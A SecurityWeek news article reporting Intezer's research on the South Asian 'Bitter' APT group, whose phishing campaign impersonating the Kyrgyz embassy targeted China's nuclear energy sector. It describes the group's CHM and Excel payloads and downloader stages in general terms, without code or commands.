Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cyberwarfare

China’s Nuclear Energy Sector Targeted in Cyberespionage Campaign 

A South Asian espionage group named Bitter has been targeting the Chinese nuclear energy sector.

A South Asian advanced persistent threat (APT) actor has been targeting the nuclear energy sector in China in a recent cyberespionage campaign, Intezer reports.

Dubbed ‘Bitter’ and active since at least 2021, the group is known for the targeting of energy and government organizations in Bangladesh, China, Pakistan, and Saudi Arabia, and is characterized by the use of Excel exploits, and Microsoft Compiled HTML Help (CHM) and Windows Installer (MSI) files.

Continuing to target Chinese organizations, the group used updated first-stage payloads in the recently observed espionage campaign, added an extra layer of obfuscation, and employed additional decoys for social engineering.

The Bitter APT targeted recipients in China’s nuclear energy industry with at least seven phishing emails impersonating the embassy of Kyrgyzstan in China, inviting them to join conferences on relevant subjects.

The recipients were lured into downloading and opening an attached RAR archive containing CHM or Excel payloads designed to achieve persistence and fetch additional malware from the command-and-control (C&C) server.

Observed Excel payloads contained an Equation Editor exploit designed to set a scheduled task to download a next-stage EXE file, and another task to execute the payload.

CHM files, on the other hand, can be used to simply execute arbitrary code with low user interaction, even if a vulnerable iteration of Microsoft Office is not installed, and the Bitter APT used multiple such files in this campaign.

One of the identified variants creates a scheduled task to execute a remote MSI payload using msiexec. While investigating the attack chain, Intezer was only served empty MSI files, which the attackers could use for reconnaissance and which could be swapped with an actual payload if the target is deemed promising.

Advertisement. Scroll to continue reading.

A second version of the CHM file was observed performing similar activity using an encoded PowerShell command stage.

“Bitter APT do not appear to change their tactics too much, therefore we can assume that the payloads will be similar to those observed in 2021, executing a downloader module that can be served with plugins such as a keylogger, remote access tool, file stealer, or browser credential stealer,” Intezer notes.

Related: New Espionage Group ‘YoroTrooper’ Targeting Entities in European, CIS Countries

Related: Microsoft: 17 European Nations Targeted by Russia in 2023 as Espionage Ramping Up

Related: Military Organizations in Pakistan Targeted With Sophisticated Espionage Tool

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

Karl Triebes has joined Ivanti as Chief Product Officer.

Steven Hernandez has joined USAID as CISO and Deputy CIO.

Data security and privacy firm Protegrity has named Michael Howard as its CEO.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.